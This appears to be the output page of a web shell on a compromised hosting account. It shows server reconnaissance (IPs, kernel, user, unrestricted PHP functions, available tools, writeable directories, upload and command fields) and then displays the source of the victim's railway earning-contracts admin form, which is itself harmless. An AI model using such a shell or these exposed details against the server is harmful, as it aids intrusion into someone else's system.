Private
Server IP : 192.124.249.33  /  Your IP : 66.248.200.33
Web Server : Apache
System : Linux 141.134.66.148.host.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els6.x86_64 #1 SMP Fri Sep 13 13:42:20 UTC 2024 x86_64
User : tarangglobal ( 1001)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/tarangglobal/public_html/cyber/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/tarangglobal/public_html/cyber/admin/earning_contracts.php
<!DOCTYPE html>
<html>
<head>

	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
	<meta name="description" content="Materia - Admin Template">
	<meta name="keywords" content="materia, webapp, admin, dashboard, template, ui">
	<meta name="author" content="solutionportal">
	<!-- <base href="/"> -->

	<title>Earning Contracts</title>
	
	<link rel="stylesheet" href="fonts/ionicons/css/ionicons.min.css">
	<link rel="stylesheet" href="fonts/font-awesome/css/font-awesome.min.css">

	<!-- Plugins -->
	<link rel="stylesheet" href="styles/plugins/c3.css">
	<link rel="stylesheet" href="styles/plugins/waves.css">
	<link rel="stylesheet" href="styles/plugins/perfect-scrollbar.css">

	
	<!-- Css/Less Stylesheets -->
	<link rel="stylesheet" href="styles/bootstrap.min.css">
	<link rel="stylesheet" href="styles/main.min.css">

<link href='http://fonts.googleapis.com/css?family=Roboto:400,500,700,300' rel='stylesheet' type='text/css'>
<!-- Match Media polyfill for IE9 -->
<!--[if IE 9]> <script src="scripts/ie/matchMedia.js"></script>  <![endif]--> 

<style>
.form-control {
	border:1px solid#ddd;
}
.table-1 td{
	padding:5px;
	border:1px solid#ddd;
}
.active{
	background-color: rgb(58, 57, 57) !important;
}

</style>
	

</head>
<body id="app" class="app off-canvas">
	<!-- #Start header -->
	<?php include('_header.php');?>

	<!-- #end header -->

	<!-- main-container -->
	
	
	<div class="main-container clearfix">
		<!-- main-navigation -->
		<?php include('_left-menu.php');?>
		<!-- #end main-navigation -->

		<!-- content-here -->
		<div class="content-container" id="content">
			<!-- dashboard page -->
			<div class="page page-dashboard">

				<div class="page-wrap">

					<div class="row">
						<!-- dashboard header -->
						<div class="col-md-12">
							<div class="dash-head clearfix mt30 mb20">
								<div class="left">
									<h4 class="mb5 text-light" style="font-weight:bold;">Earning Contracts Master</h4>
								</div>
								<div class="right mt10">
									<h5 class="text-bold mb0 mt5"><a href="#?act=add">Add New Record</a></h5>
								</div>
							</div>
						</div>
					</div> <!-- #end row -->

					<!-- mini boxes -->
					<div class="row">
					
						<div class="col-md-8" style="margin:auto;float:none;">
							<div style="width:100%;float:left;background-color:#fff;padding:15px;">
								<div class="col-md-12" style="padding:0px;">
								
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Reg No</label>
									<input type="text" class="form-control" placeholder="Reg No." name="partycode" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Tender Date</label>
									<input type="text" class="form-control" placeholder="" name="partycode" value=""/>
								</div>		
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Tender No.</label>
									<input type="text" class="form-control" placeholder="" name="tenderno" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Tender Opening Date</label>
									<input type="text" class="form-control" placeholder="" name="opningdt" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Contact Type</label>
									<select class="form-control" name="contacttype">
										<option value="">-- Select Contact Type</option>
										<option>Pay and Park</option>
										<option>Pay and Use</option>
										<option>STD PCO Stall</option>
									</select>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Contract Period</label>
									<input type="text" class="form-control" placeholder="" name="contprd" value=""/>
								</div>
								<div class="col-md-8" style="margin-bottom:10px;">
									<label>Party Name</label>
									<input type="text" class="form-control" placeholder="" name="prtyname" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>City</label>
									<input type="text" class="form-control" placeholder="" name="city" value=""/>
								</div>
								<div class="col-md-6" style="margin-bottom:10px;">
									<label>Purpose</label>
									<select class="form-control" name="purpose">
										<option value="">-- Select Purpose --</option>
										<option>Pay and Park Contract</option>
									</select>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Amount</label>
									<input type="text" class="form-control" placeholder="" name="amount" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>LOA No.</label>
									<input type="text" class="form-control" placeholder="" name="agtamt" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>LOA Date</label>
									<input type="text" class="form-control" placeholder="" name="agtformdt" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Station</label>
									<input type="text" class="form-control" placeholder="" name="station" value=""/>
								</div>								
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Location</label>
									<input type="text" class="form-control" placeholder="" name="location" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Platform</label>
									<input type="text" class="form-control" placeholder="" name="platform" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Penalty</label>
									<input type="text" class="form-control" placeholder="" name="penalty" value=""/>
								</div>								
								
								<div class="col-md-3" style="margin-bottom:10px;">
									<label style="font-size:13px;">License Fee Due/ Year</label>
									<input type="text" class="form-control" placeholder="" name="licnsdue" value=""/>
								</div>
								<div class="col-md-3" style="margin-bottom:10px;">
									<label>TCS Due</label>
									<input type="text" class="form-control" placeholder="" name="tcsdue" value=""/>
								</div>
								<div class="col-md-3" style="margin-bottom:10px;">
									<label>Security Deposit Due</label>
									<input type="text" class="form-control" placeholder="" name="secdepdue" value=""/>
								</div>
								<div class="col-md-3" style="margin-bottom:10px;">
									<label>Service Tax Due</label>
									<input type="text" class="form-control" placeholder="" name="srvtax" value=""/>
								</div>
								
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Agt No.</label>
									<input type="text" class="form-control" placeholder="" name="agtno" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Agt From Date</label>
									<input type="text" class="form-control" placeholder="" name="agtno" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Agt To Date</label>
									<input type="text" class="form-control" placeholder="" name="agtno" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Periodicity of Payment</label>
									<select class="form-control" name="periodypmt">
										<option value="">-- Select Periodicity --</option>
										<option>Quarterly</option>
										<option>Healfyerly</option>
										<option>Yearly</option>
									</select>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Eextension From</label>
									<input type="text" class="form-control" placeholder="" name="agtno" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Eextension To</label>
									<input type="text" class="form-control" placeholder="" name="agtno" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Status</label>
									<select class="form-control" name="status">
										<option value="">-- Select Status --</option>
										<option>Live</option>
									</select>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;">
									<label>Closed Date</label>
									<input type="text" class="form-control" placeholder="" name="closddt" value=""/>
								</div>
								<div class="col-md-4" style="margin-bottom:10px;padding-top:20px;">
									<label><input type="checkbox" name="vettedbyact"> Vetted By Act</label>
									<label><input type="checkbox" name="cavettedbyact"> CA Vetted By Accts</label>
								</div>
								
							</div>
							
								
								<div class="col-md-3" style="text-align:center">&nbsp;</div>
								<div class="col-md-5" style="text-align:center">
									<button class="btn btn-primary mr5 waves-effect" type="submit" value="edit" id="btn-add">Save</button>
									<button class="btn btn-primary mr5 waves-effect" type="submit" value="edit" id="btn-add">Cancle</button>
									<button class="btn btn-primary mr5 waves-effect" type="submit" value="edit" id="btn-add">Exit</button>
								</div>			
								</div>
						</div>
					</div> <!-- #end row -->

					
				</div> <!-- #end page-wrap -->
			</div>
			<!-- #end dashboard page -->
		</div>
	</div>
	

	<!-- theme settings -->
	<div class="site-settings clearfix hidden-xs">
		<div class="settings clearfix">
			<div class="trigger ion ion-settings left"></div>
			<div class="wrapper left">
				<ul class="list-unstyled other-settings">
					<li class="clearfix mb10">
						<div class="left small">av Horizontal</div>
						<div class="md-switch right">
							<label>
								<input type="checkbox" id="navHorizontal"> 
								<span>&nbsp;</span> 
							</label>
						</div>
						
						
					</li>
					<li class="clearfix mb10">
						<div class="left small">Fixed Header</div>
						<div class="md-switch right">
							<label>
								<input type="checkbox"  id="fixedHeader"> 
								<span>&nbsp;</span> 
							</label>
						</div>
					</li>
					<li class="clearfix mb10">
						<div class="left small">av Full</div>
						<div class="md-switch right">
							<label>
								<input type="checkbox"  id="navFull"> 
								<span>&nbsp;</span> 
							</label>
						</div>
					</li>
				</ul>
				<hr/>
				<ul class="themes list-unstyled" id="themeColor">
					<li data-theme="theme-zero" class="active"></li>
					<li data-theme="theme-one"></li>
					<li data-theme="theme-two"></li>
					<li data-theme="theme-three"></li>
					<li data-theme="theme-four"></li>
					<li data-theme="theme-five"></li>
					<li data-theme="theme-six"></li>
					<li data-theme="theme-seven"></li>
				</ul>
			</div>
		</div>
	</div>
	<!-- #end theme settings -->


	

	<!-- Dev only -->
	<!-- Vendors -->
	<script src="scripts/vendors.js"></script>
	<script src="scripts/plugins/d3.min.js"></script>
	<script src="scripts/plugins/c3.min.js"></script>
	<script src="scripts/plugins/screenfull.js"></script>
	<script src="scripts/plugins/perfect-scrollbar.min.js"></script>
	<script src="scripts/plugins/waves.min.js"></script>
	<script src="scripts/plugins/jquery.sparkline.min.js"></script>
	<script src="scripts/plugins/jquery.easypiechart.min.js"></script>
	<script src="scripts/plugins/bootstrap-rating.min.js"></script>
	<script src="scripts/app.js"></script>
	<script src="scripts/index.init.js"></script>
	
</body>
</html>



Private